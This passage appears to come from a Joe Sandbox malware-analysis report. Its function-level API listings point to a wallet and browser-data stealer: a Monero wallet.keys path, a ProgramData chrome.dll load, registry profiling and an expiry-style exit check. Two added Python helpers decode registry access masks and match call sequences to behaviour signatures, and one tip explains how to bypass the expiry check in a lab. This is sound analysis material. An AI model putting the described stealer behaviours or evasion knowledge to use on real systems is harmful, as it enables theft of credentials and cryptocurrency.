                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 604d908a289c90df4408a67e5e856b21176ee5ded9220d0e52d7907fbd8933b3
                                  • Instruction ID: e2a320d9837698e273d3f7e06e3eee89a4ee09df431babab939e1ba3ca8835b5
                                  • Opcode Fuzzy Hash: 604d908a289c90df4408a67e5e856b21176ee5ded9220d0e52d7907fbd8933b3
                                  • Instruction Fuzzy Hash: 4A21CD75D14208ABCF04DFE8E9459EEB7B9BF48300F04852AE516B3250EB349644CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB8F8,00000000,00020119,?), ref: 00717FEE
                                  • RegQueryValueExA.ADVAPI32(?,011DDA68,00000000,00000000,000000FF,000000FF), ref: 0071800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00718022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 9333f64541862715696d296e02289007045a8c5818f5d6019d56ed45de608cbb
                                  • Instruction ID: 2ceb7cab132db0aeb785f7b04b2a779b22879976e2b4ee7cd793a22ef401ad7d
                                  • Opcode Fuzzy Hash: 9333f64541862715696d296e02289007045a8c5818f5d6019d56ed45de608cbb
                                  • Instruction Fuzzy Hash: 401191B1A89209EFD700CFC8DD45FBFBB78EB08B10F10421AF611A7280E77958409BA1
                                  APIs
                                  • StrStrA.SHLWAPI(011DE5F0,00000000,00000000,?,00709F71,00000000,011DE5F0,00000000), ref: 007193FC
                                  • lstrcpyn.KERNEL32(009D7580,011DE5F0,011DE5F0,?,00709F71,00000000,011DE5F0), ref: 00719420
                                  • lstrlen.KERNEL32(00000000,?,00709F71,00000000,011DE5F0), ref: 00719437
                                  • wsprintfA.USER32 ref: 00719457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: dcdc4146b03250df592a2debf0bd3cd56b26ea54b6cb5c9d9330c6e20d181d01
                                  • Instruction ID: 91afabe6bf9e12d81ce1754e5b13d5790fddc1cda99b8d4eab64c93d0177055b
                                  • Opcode Fuzzy Hash: dcdc4146b03250df592a2debf0bd3cd56b26ea54b6cb5c9d9330c6e20d181d01
                                  • Instruction Fuzzy Hash: D5011E75548208FFCB04DFE8D954EAEBBB8EF48304F108249F9098B340E631AA80DB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007012B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007012BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007012D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007012F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007012FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 712f8526f6ae50582f557ad8a2dc2111cf325d78c34910efb72d610246b17338
                                  • Instruction ID: fb02f3bee99ffe963a7171b7fca1e040fa96007a1894de7bc39c5d3c69d3d084
                                  • Opcode Fuzzy Hash: 712f8526f6ae50582f557ad8a2dc2111cf325d78c34910efb72d610246b17338
                                  • Instruction Fuzzy Hash: FB013179A59209BFDB00DFD0DC49FAEB7B8EB48700F004199FB1597280E7709A409B90
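This function and the two registry-reading functions before it (at 00714344 and 00717FEE) all pass 00020119 as the samDesired argument to RegOpenKeyExA, with 80000001 (HKEY_CURRENT_USER) and 80000002 (HKEY_LOCAL_MACHINE) as roots; in this last one the sandbox printed the root as 000000FF, i.e. it did not resolve it. The decoder below is an added example, not part of the report or the sample. It splits the access mask into its named rights and resolves the predefined root handles, using the documented winreg.h constant values; the call arguments it is run over are copied from the three report lines. The point it makes is that 0x20119 is KEY_READ plus KEY_WOW64_64KEY, so this 32-bit process is explicitly asking for the 64-bit registry view rather than the redirected WOW64 view, which is where most of the values a stealer profiles a host with actually live. The 00000104 visible beside the heap allocation is 260, MAX_PATH, which is consistent with a path-sized buffer for the value read back, though the report does not say that.

```python
from typing import Dict, List, Tuple

# Predefined root-key handles (winreg.h). The report prints them as the first
# RegOpenKeyExA argument, e.g. 80000001.
HKEY_ROOTS: Dict[int, str] = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Composite masks are matched whole first, then the remaining individual bits.
KEY_ALL_ACCESS = 0xF003F
KEY_READ = 0x20019   # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_WRITE = 0x20006  # READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY
COMPOSITES: List[Tuple[int, str]] = [
    (KEY_ALL_ACCESS, "KEY_ALL_ACCESS"), (KEY_READ, "KEY_READ"), (KEY_WRITE, "KEY_WRITE"),
]
KEY_RIGHTS: List[Tuple[int, str]] = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
    (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x00010000, "DELETE"), (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"), (0x00080000, "WRITE_OWNER"),
]

def decode_sam(sam: int) -> List[str]:
    """Name the rights in a REGSAM value; unknown leftover bits are reported as such."""
    names: List[str] = []
    remaining = sam
    for mask, name in COMPOSITES:
        if (remaining & mask) == mask:
            names.append(name)
            remaining &= ~mask
    for bit, name in KEY_RIGHTS:
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"UNKNOWN(0x{remaining:X})")
    return names

def decode_root(hkey: int) -> str:
    """Predefined root name, or a marker for a value the sandbox did not resolve."""
    return HKEY_ROOTS.get(hkey, f"unresolved handle 0x{hkey:X}")

def wants_64bit_view(sam: int) -> bool:
    """True when a WOW64 process asks to bypass registry redirection (KEY_WOW64_64KEY)."""
    return bool(sam & 0x0100)

# (ref address, hKey, samDesired) copied from the three RegOpenKeyExA calls in the report.
REPORT_CALLS: List[Tuple[int, int, int]] = [
    (0x00714344, 0x80000001, 0x20119),
    (0x00717FEE, 0x80000002, 0x20119),
    (0x007012D7, 0x000000FF, 0x20119),  # hKey printed as 000000FF: not resolved by the sandbox
]

def describe_report_calls() -> List[Dict[str, object]]:
    return [
        {"ref": f"{ref:08X}", "root": decode_root(hkey), "rights": decode_sam(sam),
         "wow64_64bit_view": wants_64bit_view(sam)}
        for ref, hkey, sam in REPORT_CALLS
    ]

if __name__ == "__main__":
    for row in describe_report_calls():
        print(row)
```

When reproducing the registry reads in a lab, open the same keys with KEY_WOW64_64KEY from a 32-bit process; reading through the redirected WOW6432Node view can return different values and mislead the comparison.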
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: e96e42c19eaaa30597a8652bea4c4d87aa232c22cf23f90050519e3735419929
                                  • Instruction ID: 213ac71939138eb85da3c041b1217205170ba7334476b41dda4a7abfe8683e1a
                                  • Opcode Fuzzy Hash: e96e42c19eaaa30597a8652bea4c4d87aa232c22cf23f90050519e3735419929
                                  • Instruction Fuzzy Hash: 694107B014479C9EDB328B68CC85FFB7BEC9B45704F1444E8E98A961C2E2759E849F60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00716903
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007169C6
                                  • ExitProcess.KERNEL32 ref: 007169F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 5910202cf5fa6356e4cfd61f9666cfc4d7da41fa8408867a72e713302ea2d144
                                  • Instruction ID: 2c4d23b54ad366e523c5ca483c89e0a6916011207f6eef5a2d34d98c89c2c656
                                  • Opcode Fuzzy Hash: 5910202cf5fa6356e4cfd61f9666cfc4d7da41fa8408867a72e713302ea2d144
                                  • Instruction Fuzzy Hash: 4A3168F1916218EACB14EB94DC96FDEB778AF08300F400189F205621D1DF786A88CF69
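Two of the call lists above deserve a second look: this function (GetModuleFileNameA, string building in subcalls where `\Monero\wallet.keys` appears as an lstrlen argument, ShellExecuteEx, ExitProcess) and the earlier one at 00716C0C (GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess), alongside the registry-read functions. Ordered call lists like these are quicker to triage by script than by eye. The block below is an added example, not from the Joe Sandbox report or the sample: it parses the report's own APIs entries, including the indented "Part of subcall function" lines, into structured calls and matches ordered subsequences against a few behaviour patterns. The pattern names and the readings attached to them are analyst inferences, not statements the report makes: a GetSystemTime, sscanf, SystemTimeToFileTime, ExitProcess chain is consistent with a hard-coded expiry date, which matters because a sandbox run after that date would see the sample exit before doing anything of interest. The sample text fed to the parser is copied verbatim from the three functions named above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One "APIs" entry as printed by the Joe Sandbox IDA plugin, with or without an
# argument list, optionally attributed to a subcall ("Part of subcall function ...").
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # address of the call site
    subcall_of: Optional[int] = None  # callee whose body the call belongs to, if indented

def parse_calls(block: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in block.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue  # headings such as "APIs" / "Strings" and blank lines
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

# Ordered API subsequences worth flagging. Names and readings are ours, not the report's.
SIGNATURES: Dict[str, List[str]] = {
    "expiry_check": ["GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"],
    "launch_and_exit": ["ShellExecuteEx", "ExitProcess"],
    "registry_string_read": ["RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"],
    "heap_string_format": ["GetProcessHeap", "RtlAllocateHeap", "wsprintfA"],
}
WALLET_HINTS = ("wallet", ".keys")

def is_subsequence(pattern: List[str], seq: List[str]) -> bool:
    """True if every item of pattern occurs in seq in that order, gaps allowed."""
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)

def classify(block: str) -> Dict[str, object]:
    calls = parse_calls(block)
    apis = [c.api for c in calls]
    hits = [name for name, pat in SIGNATURES.items() if is_subsequence(pat, apis)]
    if any(h in a.lower() for c in calls for a in c.args for h in WALLET_HINTS):
        hits.append("crypto_wallet_path")
    return {"calls": calls, "signatures": sorted(hits)}

# Report text copied verbatim from the functions at 00716C0C, 00716903 and 00717FC7.
EXPIRY_BLOCK = r"""
• GetSystemTime.KERNEL32(?), ref: 00716C0C
• sscanf.NTDLL ref: 00716C39
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C52
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C60
• ExitProcess.KERNEL32 ref: 00716C7A
"""
LAUNCH_BLOCK = r"""
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00716903
  • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
  • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
  • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
  • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
  • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
• ShellExecuteEx.SHELL32(0000003C), ref: 007169C6
• ExitProcess.KERNEL32 ref: 007169F5
"""
REGISTRY_BLOCK = r"""
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717FC7
• RtlAllocateHeap.NTDLL(00000000), ref: 00717FCE
• RegOpenKeyExA.ADVAPI32(80000002,011CB8F8,00000000,00020119,?), ref: 00717FEE
• RegQueryValueExA.ADVAPI32(?,011DDA68,00000000,00000000,000000FF,000000FF), ref: 0071800F
• RegCloseKey.ADVAPI32(?), ref: 00718022
"""

if __name__ == "__main__":
    for name, block in (("00716C0C", EXPIRY_BLOCK), ("00716903", LAUNCH_BLOCK), ("00717FC7", REGISTRY_BLOCK)):
        print(name, classify(block)["signatures"])
```

If the expiry pattern holds, rerunning the sample with the analysis VM's clock set back before the date the sscanf call parses is the cheap way to get past the early ExitProcess; the subsequence matcher is deliberately gap-tolerant so the same signature still fires when the compiler or a packer interleaves unrelated calls.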
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00720E10,00000000,?), ref: 007189BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007189C6
                                  • wsprintfA.USER32 ref: 007189E0
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: a9a4357564ef3b336ae7026c44d560dfc14abc448bb03fa2ff50f10c4f420788
                                  • Instruction ID: 161e44dd39974d95f739adce10b1c6afe40da37a323548beea768e454afcf04b
                                  • Opcode Fuzzy Hash: a9a4357564ef3b336ae7026c44d560dfc14abc448bb03fa2ff50f10c4f420788
                                  • Instruction Fuzzy Hash: 882160B1A99214AFDB00DFD8DC45FAEBBB8FB48710F10411AF615A72C0D77569408BA0
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0070A098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: 1cde361075064e694e948a38c7af36f85f91e6aaadc62aa0785cfd26815bf488
                                  • Instruction ID: ad877f94c7a4fc348f1e9bfa3790d5f6a4a6e37043e169a068e3f3dcd85698db
                                  • Opcode Fuzzy Hash: 1cde361075064e694e948a38c7af36f85f91e6aaadc62aa0785cfd26815bf488
                                  • Instruction Fuzzy Hash: 8BF030705EE328FFD7109BE0ED44B66B3A4B315344F501526F005AB1D0E7B968C4EB62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007196AE,00000000), ref: 00718EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00718EF2
                                  • wsprintfW.USER32 ref: 00718F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: ca603b95d6c963481a649e4a7382402b4f0d19ea301433fe453c2e36bfea4262
                                  • Instruction ID: 9318348ebd271572ac30689f46c8df1155e28014ca5790949b944547ec1902a5
                                  • Opcode Fuzzy Hash: ca603b95d6c963481a649e4a7382402b4f0d19ea301433fe453c2e36bfea4262
                                  • Instruction Fuzzy Hash: 15E08670A9D308BBD700CBD4DD0AE5DB778EB04301F000195FE0987340E9715E409B91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
